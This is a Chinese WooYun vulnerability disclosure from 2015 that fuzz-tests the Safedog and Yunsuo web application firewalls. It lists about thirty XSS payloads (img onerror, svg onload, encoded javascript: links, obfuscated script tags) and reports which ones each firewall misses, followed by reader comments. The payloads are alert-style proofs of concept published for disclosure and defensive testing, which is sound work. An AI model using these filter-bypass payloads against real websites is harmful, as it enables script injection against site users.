当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089591

漏洞标题:国内WAF的Fuzz测试之xss篇(安全狗、云锁为例)

相关厂商:cncert国家互联网应急中心

漏洞作者: HackBraid

提交时间:2015-01-04 15:30

修复时间:2015-04-04 15:32

公开时间:2015-04-04 15:32

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-04: 细节已通知厂商并且等待厂商处理中
2015-01-09: 厂商已经确认,细节仅向厂商公开
2015-01-12: 细节向第三方安全合作伙伴开放
2015-03-05: 细节向核心白帽子及相关领域专家公开
2015-03-15: 细节向普通白帽子公开
2015-03-25: 细节向实习白帽子公开
2015-04-04: 细节向公众公开

简要描述:

用安全狗和云锁为例进行测试发现不少问题
来个闪电可好~

详细说明:

通过cheat sheet的可以批量对WAF进行测试,这里测试WAF的XSS防护能力,发现很严重的问题。
0x00 测试环境
wamp+74cms,参照 WooYun: 实战绕过云锁(1.3.145)进行注入测试绕过技巧 里配置,在url输入xss语句后,会被带入数据库端查询,所以会经过安全狗、云锁等WAF的检查。
0x01 XSS payload

<img src=x onerror=alert(1)>
<img/src=x onerror=alert(1)>
<img src=x onerror=alert(1)> 
<img src=x onerror=window.open('http://google.com');>
<img/src/onerror=alert(1)>
<img src="x:kcf" onerror="alert(1)">
<a href=javascript:alert(2)>M 
<a href=j&#x61;v&#97script&#x3A;&#97lert(13)>M
<a href=data:text/html;%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>M 
<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
<script firefox>alert(1)</script>
<script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script> // 
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script>
<script>prompt(-[])</script>
<script>alert(/3/)</script>
<script>alert(String.fromCharCode(49))</script>
<script>alert(/7/.source)</script>
<script>setTimeout('alert(1)',0)</script> 
<form><button formaction=javascript&colon;alert(1)>M
<button onfocus=alert(1) autofocus>
<button/onclick=alert(1) >M</button>
<p/onmouseover=javascript:alert(1); >M</p>
<var onmouseover="prompt(1)">KCF</var>
<div/onmouseover='alert(1)'>X 
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
<select onfocus=javascript:alert(1) autofocus>
<textarea onfocus=javascript:alert(1) autofocus>
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg> 
<math href="javascript:javascript:alert(1)">CLICKME</math> 
<video><source onerror="alert(1)"> 
<audio src=x onerror=alert(47)>


0x02 安全狗XSS测试结果:
1.<img src=x onerror=alert(1)> 被安全狗拦截

x.jpg


2.<img/src=x onerror=alert(1)> 绕过了

x1.jpg


3.<a>标签没有防护
<a href=javascript:alert(2)>

x2.jpg


4.<script>标签都被拦截
<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>

x3.jpg


5.select、textarea、svg、button、math、video等标签都没防护
<select onfocus=javascript:alert(1) autofocus>

x4.jpg


<textarea onfocus=javascript:alert(1) autofocus>

x5.jpg


<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>

x6.jpg


<math href="javascript:javascript:alert(1)">CLICKME</math>

x7.jpg


<video><source onerror="alert(1)">

x8.jpg


<audio src=x onerror=alert(47)></code>

x9.jpg


<button onfocus=alert(1) autofocus>

x10.jpg


0x03 云锁测试结果
1.<img src=x onerror=alert(1)> 拦截

y.jpg


2.<img/src=x onerror=alert(1)> 绕过

x1.jpg


3.<a>标签没有防护
<a href=javascript:alert(2)>

x2.jpg


4.<script>标签被拦截
<script>alert(String.fromCharCode(49))</script>

y1.jpg


5.select、textarea、svg、button、math、video等标签同样都没防护
<select onfocus=javascript:alert(1) autofocus>

x4.jpg


<textarea onfocus=javascript:alert(1) autofocus>

x5.jpg


<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>

x6.jpg


<math href="javascript:javascript:alert(1)">CLICKME</math>

x7.jpg


<video><source onerror="alert(1)">

x8.jpg


<audio src=x onerror=alert(47)></code>

x9.jpg


<button onfocus=alert(1) autofocus>

x10.jpg


0x04 总结
安全狗、云锁在XSS防护方面只针对<script>标签做了防护,<img>可简单绕过,而像a、select、textarea、svg、button、math、video等标签是没有任何防护能力的。

漏洞证明:

见详细

修复方案:

增加防护规则

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-01-09 13:39

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-01-04 15:59 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    这种思路好像没人用过,可惜没有雷劈~

  2. 2015-01-04 17:10 | debbbbie ( 路人 | Rank:10 漏洞数:2 | 深藏功与名 - A Rubyist)

    @HackBraid 超音速发包?然后看返回?

  3. 2015-01-04 17:14 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    @debbbbie 光速、要注重效率

  4. 2015-01-04 17:33 | debbbbie ( 路人 | Rank:10 漏洞数:2 | 深藏功与名 - A Rubyist)

    @HackBraid 真的不会把网站发死了嘛。

  5. 2015-01-09 15:54 | 劳资就是美国佬 ( 路人 | Rank:2 漏洞数:2 | 劳资就是美国佬)

    乌云SHELL上传http://www.wooyun.org/editor/image.php?uploadedId=

  6. 2015-01-21 11:27 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    这些payload什么的很常见了。管理员觉得也没什么特别的所以就不给雷了

  7. 2015-04-04 21:28 | bitcoin ( 普通白帽子 | Rank:715 漏洞数:218 | 学习是最好的投资!)

    这个好多钱呢?

  8. 2015-04-15 12:36 | Watermelon ( 实习白帽子 | Rank:37 漏洞数:9 | Watermelon)

    看下某安全宝 2011年漏洞 被忽略的去看看

  9. 2015-04-15 13:19 | HackBraid 认证白帽子 ( 核心白帽子 | Rank:1545 漏洞数:260 | ...........................................)

    @Watermelon 名字都要起的高大上点,其实内容就那样。只是那会儿有点时间看了看